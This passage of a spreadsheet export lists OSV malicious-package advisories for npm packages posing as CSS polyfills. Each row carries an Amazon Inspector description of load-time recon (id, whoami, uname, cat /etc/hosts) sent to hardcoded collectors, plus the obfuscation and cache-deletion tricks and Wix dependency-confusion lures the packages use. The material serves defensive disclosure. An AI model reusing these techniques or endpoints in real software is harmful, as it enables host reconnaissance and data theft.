css-a11y-contrast-utils@1.0.0 is advertised as a WCAG contrast utility but ships no contrast code — index.js exports an empty object. The package instead defines a Proxy stub exposing identifiers from Wix's internal Thunderbolt registry namespace (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.), and its manifest points at static.parastorage.com/unpkg/css-a11y-contrast-utils, consistent with a dependency-confusion squat targeting a private Wix registry. On module load, thunderboltRegistry.js runs an IIFE that executes `hostname`, `id`, and `uname -r` via child_process and exfiltrates the collected host, uid, kernel version, Node version, and pid by (a) issuing DNS lookups to subdomains of the hardcoded OAST collector davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live and (b) HTTP GET to the hardcoded webhook https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The cover-story metadata plus internal-registry naming plus the on-load recon beacon make the entire purpose of the package a dependency-confusion payload against installers that resolve any of these registry names.
</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17475</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17476</t>
        </is>
      </c>
      <c r="D133" s="5" t="inlineStr"/>
      <c r="E133" s="5" t="inlineStr"/>
      <c r="F133" s="5" t="inlineStr"/>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr">
        <is>
          <t>npm:css-anchor-pos-fallback</t>
        </is>
      </c>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr"/>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd0a6c8e1448ffd9abb3732872ea3d49280a422d49524aaa57d0b89a73812f05)
The package advertises itself as a CSS anchor-position polyfill but on require executes an IIFE in thunderboltRegistry.js that runs `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and reads `/etc/hosts`, then POSTs the collected output along with hostname, platform, and Node version via fetch to the hardcoded external endpoint http://dxpoc.gt.tc/callback.php/. The module also exports keys named after Wix thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, etc.) with a bundled manifest referencing a parastorage.com unpkg URL, a shape consistent with dependency-confusion targeting of an internal Wix build pipeline. The advertised polyfill purpose is unrelated to shell execution, host reconnaissance, or outbound beaconing.
</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17476</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17477</t>
        </is>
      </c>
      <c r="D134" s="5" t="inlineStr"/>
      <c r="E134" s="5" t="inlineStr"/>
      <c r="F134" s="5" t="inlineStr"/>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr">
        <is>
          <t>npm:css-env-function-shim</t>
        </is>
      </c>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr"/>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (03e6fced50259d6d3781ef3917caba965e4744420188c3e06919541b64e2e294)
Package self-describes as a CSS env() shim but ships thunderboltRegistry.js, which runs an IIFE at module load that base64-decodes the strings 'child_process' and 'execSync', dynamically requires child_process, and shells out whoami, uname, cat /etc/hosts, ifconfig/ip addr, id, and hostname. The collected output is POSTed to a hardcoded webhook.site URL (webhook.site/0492a36c-4d7b-408a-865c-226db25987ba) and beaconed to a subdomain of davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live for DNS exfiltration. All sensitive identifiers (module name, method name, commands, destination host, UUID path, OAST subdomain) are stored as base64 blobs or String.fromCharCode arrays and reconstructed at runtime to defeat static inspection. index.js is a stub; the module factory is re-exported under nine Wix-internal registry key names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, and similar), and the shipped registry-manifest.min.json aliases numerous Wix thunderbolt *Registry.js URLs on parastorage.com to this package's thunderboltRegistry.js — a dependency-confusion lure targeting Wix's internal build so that any importer of those names triggers the exfiltration IIFE at require time.
</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17477</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17478</t>
        </is>
      </c>
      <c r="D135" s="5" t="inlineStr"/>
      <c r="E135" s="5" t="inlineStr"/>
      <c r="F135" s="5" t="inlineStr"/>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr">
        <is>
          <t>npm:css-field-sizing-polyfill</t>
        </is>
      </c>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr"/>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (549bb8820cb6a8a35853826d17b64df14c0561b83790192a33c5dc76dbad53b9)
The package advertises itself as a CSS field-sizing polyfill but ships thunderboltRegistry.js, which runs an IIFE at module load time. The IIFE shells out via child_process.execSync to run `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts`, then transmits the collected output together with hostname, Node version, platform, and pid as query-string parameters to the hardcoded plaintext endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The module also exports proxied stubs for Wix-internal names (`thunderboltRegistry`, `siteAssetsRegistry`, `documentManagementRegistry`, `editorRegistry`, `corvidRegistry`) and ships a `registry-manifest.min.json` pointing at `static.parastorage.com`, indicating a dependency-confusion impersonation of Wix internal packages so that an internal resolver pulling this public name will trigger the beacon. The reconnaissance behavior is unrelated to the declared CSS polyfill purpose and fires on any `require()` of the package.
</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17478</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17479</t>
        </is>
      </c>
      <c r="D136" s="5" t="inlineStr"/>
      <c r="E136" s="5" t="inlineStr"/>
      <c r="F136" s="5" t="inlineStr"/>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr">
        <is>
          <t>npm:css-gap-decorations-polyfill</t>
        </is>
      </c>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr"/>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8126656cc344a4f632b8ddf5a23683fc92ac22798bb67e1aed6bca73ac82d7b6)
The package is published as a CSS polyfill but ships no polyfill functionality. On require(), thunderboltRegistry.js uses child_process.execSync to run whoami, uname -a, ifconfig/ip addr, and read /etc/hosts, then sends each result along with a beacon (node version, platform, pid) as query parameters to the hardcoded attacker-controlled endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package exposes stub factories under internal-sounding names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) and bundles a registry-manifest.min.json mapping them all to a single parastorage.com asset, consistent with a dependency-confusion attack targeting a private Wix/Thunderbolt package namespace. Installer harm: host identity, kernel version, network configuration, and /etc/hosts contents are exfiltrated to an attacker-controlled host simply by resolving and loading the package.
</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17479</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17480</t>
        </is>
      </c>
      <c r="D137" s="5" t="inlineStr"/>
      <c r="E137" s="5" t="inlineStr"/>
      <c r="F137" s="5" t="inlineStr"/>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr">
        <is>
          <t>npm:css-interop-observer-polyfill</t>
        </is>
      </c>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr"/>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (089bdc1dd6bdf0216bb911888e81ce97dc171bdef2588fd5de0aadb4a64fbb2b)
On module load, thunderboltRegistry.js executes an IIFE that runs id, whoami, uname, ifconfig/ip addr via child_process.execSync and reads /etc/hosts, then sends each result together with hostname, node version, platform and pid to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/[token] via fetch over plain HTTP. The package presents itself as a stub exporting proxies for Wix thunderbolt internal registry names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.), consistent with dependency-confusion targeting of those internal module names while the load-time code performs the host reconnaissance and exfiltration.
</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17480</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17481</t>
        </is>
      </c>
      <c r="D138" s="5" t="inlineStr"/>
      <c r="E138" s="5" t="inlineStr"/>
      <c r="F138" s="5" t="inlineStr"/>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr">
        <is>
          <t>npm:css-light-dark-polyfill</t>
        </is>
      </c>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr"/>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (856c154d7855924568c88181f172f46e84aac202bd6cb29974eb2ffaa3ec3ea7)
The package presents itself as a trivial CSS polyfill (index.js exports an empty object) but ships thunderboltRegistry.js, which on load runs a self-invoking IIFE that collects host identifiers (os.hostname, node version, platform, pid) and the output of local shell commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts via child_process.execSync) and POSTs each result via fetch() to the hardcoded endpoint https://dxpoc.gt.tc/callback.php/. The payload self-labels as 'beacon=rce-poc'. The package also exports factories under the names of internal Wix Thunderbolt build registries (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, etc.), and a bundled registry-manifest.min.json maps those names to parastorage.com URLs — a dependency-confusion shape targeting Wix-like build systems that resolve these internal registry module names. Installing or loading this package causes host reconnaissance data to be exfiltrated to an attacker-controlled domain unrelated to any CSS polyfill functionality.
</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17481</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17482</t>
        </is>
      </c>
      <c r="D139" s="5" t="inlineStr"/>
      <c r="E139" s="5" t="inlineStr"/>
      <c r="F139" s="5" t="inlineStr"/>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr">
        <is>
          <t>npm:css-logical-prop-shim</t>
        </is>
      </c>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr"/>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d0ffba65f80ee8f200199c8c90ebb6297b8590537c80ea50bb34874d91665b5f)
The package ships thunderboltRegistry.js which imports child_process and invokes execSync with curl commands at multiple sites (lines 30, 39, 47, 48). The declared purpose of the package is a CSS logical-property shim, which has no legitimate need to spawn shells or make outbound curl requests. The co-location of child_process + repeated execSync('curl...') calls in a package whose stated purpose is a frontend CSS polyfill is the shape of a dropper or exfiltration helper rather than library code, and the file name 'thunderboltRegistry' is unrelated to any CSS functionality.
</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17482</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17483</t>
        </is>
      </c>
      <c r="D140" s="5" t="inlineStr"/>
      <c r="E140" s="5" t="inlineStr"/>
      <c r="F140" s="5" t="inlineStr"/>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr">
        <is>
          <t>npm:css-reading-flow-polyfill</t>
        </is>
      </c>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr"/>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3b18e313d5fc67f07c1bcf051bd79a85dca97bb3c4510d9755efca6414bb55ff)
The package is published as css-reading-flow-polyfill but ships thunderboltRegistry.js, which impersonates internal Wix thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) by exporting all of those names from a single payload file. On require, an IIFE in thunderboltRegistry.js uses child_process.execSync to run id, whoami, uname, ifconfig/ip-addr and read /etc/hosts, then fetches http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP with the command output, hostname, Node version, platform and pid appended as query parameters. The module also walks require.cache and deletes any entry whose key contains 'thunderboltRegistry' so the recon-and-exfil IIFE re-runs on every require rather than being cached. index.js is an empty decoy; the stated CSS polyfill purpose is a cover story and the package has no implementation of that functionality.
</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17483</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17484</t>
        </is>
      </c>
      <c r="D141" s="5" t="inlineStr"/>
      <c r="E141" s="5" t="inlineStr"/>
      <c r="F141" s="5" t="inlineStr"/>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr">
        <is>
          <t>npm:css-relative-color-util</t>
        </is>
      </c>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr"/>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee0efef48c7d56201a037b237f11ec712853f86e74f6a00ef8011732b31363f1)
The package name advertises a CSS utility, but thunderboltRegistry.js runs an IIFE on module load that uses child_process.execSync to execute whoami, uname -a, cat /etc/hosts, and ifconfig/ip addr, then exfiltrates the output together with os.hostname and the Node version to a hardcoded webhook at https://dxpoc.gt.tc/callback.php/ via fetch and to an *.oast.live DNS collector via dns.resolve. The loader deletes any require.cache entry containing 'thunderboltRegistry' so the IIFE re-fires on subsequent requires, and falls back to node:child_process and new module.constructor().require('child_process') to obtain the exec primitive. The package also exports stubs named thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry and similar, matching internal Wix thunderbolt module names, with a registry-manifest.min.json pointing at static.parastorage.com unpkg paths — a dependency-confusion shape targeting an internal namespace. The declared CSS-utility purpose is unrelated to any of this behavior.
</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17484</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17485</t>
        </is>
      </c>
      <c r="D142" s="5" t="inlineStr"/>
      <c r="E142" s="5" t="inlineStr"/>
      <c r="F142" s="5" t="inlineStr"/>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>npm:css-scroll-anchor-polyfill</t>
        </is>
      </c>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr"/>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (36596ba9b9d8c0f994abe3cd87783f4f0dc880e63d55374d3555347ce349fab2)
Package is published as css-scroll-anchor-polyfill but its index.js is empty and its contents impersonate internal Wix thunderbolt registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) with a shipped registry-manifest.min.json mapping them to parastorage.com URLs. The declared purpose (a CSS scroll-anchor polyfill) is unrelated to the shipped code. thunderboltRegistry.js contains a top-level IIFE that executes on require: it runs local reconnaissance via child_process.execSync (cat /etc/hosts, whoami, id, pwd, ifconfig/ip addr, hostname, uname -a) and transmits the collected output together with a beacon (node version, process.platform, pid) via fetch to a hardcoded HTTP endpoint at http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. Any internal build that resolves one of the impersonated thunderbolt names to this public package and requires the corresponding submodule triggers the reconnaissance and exfiltration path.
</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17485</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17486</t>
        </is>
      </c>
      <c r="D143" s="5" t="inlineStr"/>
      <c r="E143" s="5" t="inlineStr"/>
      <c r="F143" s="5" t="inlineStr"/>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr">
        <is>
          <t>npm:css-scroll-state-polyfill</t>
        </is>
      </c>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr"/>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cffa0affc34bac3fa24fcc7c67aae4d120066f4f856cb8b637bc04c6ca9d482c)
The package presents itself as a CSS polyfill but ships a payload file (thunderboltRegistry.js) that executes an IIFE at require time. The IIFE uses child_process to run host-identification commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts, hostname) and collects Node version, platform, and PID, then sends the captured data via fetch to a hardcoded webhook.site collector at https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The main index.js is an empty stub; filenames mimic internal Wix Thunderbolt registry modules, consistent with a dependency-confusion squat targeting that namespace. A self-identifying 'beacon=poc15' tag is included in the request. The payload also walks require.cache and deletes any entry whose key contains 'thunderboltRegistry', causing subsequent requires in the same process to re-execute the recon-and-exfiltration path rather than return a cached export, and exports a Proxy that answers arbitrary method accesses to blend in with the impersonated registry.
</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17486</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17487</t>
        </is>
      </c>
      <c r="D144" s="5" t="inlineStr"/>
      <c r="E144" s="5" t="inlineStr"/>
      <c r="F144" s="5" t="inlineStr"/>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr">
        <is>
          <t>npm:css-snap-target-polyfill</t>
        </is>
      </c>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr"/>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (00c104d427125b4acf88ecb83a58d563507b23bcb716cb87fbf7fc953d816d42)
The package ships thunderboltRegistry.js, which uses child_process and process.platform to collect host information and POSTs it via fetch() to the hardcoded external endpoint http://dxpoc.gt.tc. The destination is unrelated to any CSS polyfill functionality the package name advertises, is served over cleartext HTTP, and is not caller-configurable. This behavior does not correspond to the declared purpose of a CSS snap-target polyfill, which has no legitimate need to execute shell commands or beacon host details to a third-party domain.
</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17487</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17488</t>
        </is>
      </c>
      <c r="D145" s="5" t="inlineStr"/>
      <c r="E145" s="5" t="inlineStr"/>
      <c r="F145" s="5" t="inlineStr"/>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr">
        <is>
          <t>npm:css-starting-style-polyfill</t>
        </is>
      </c>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
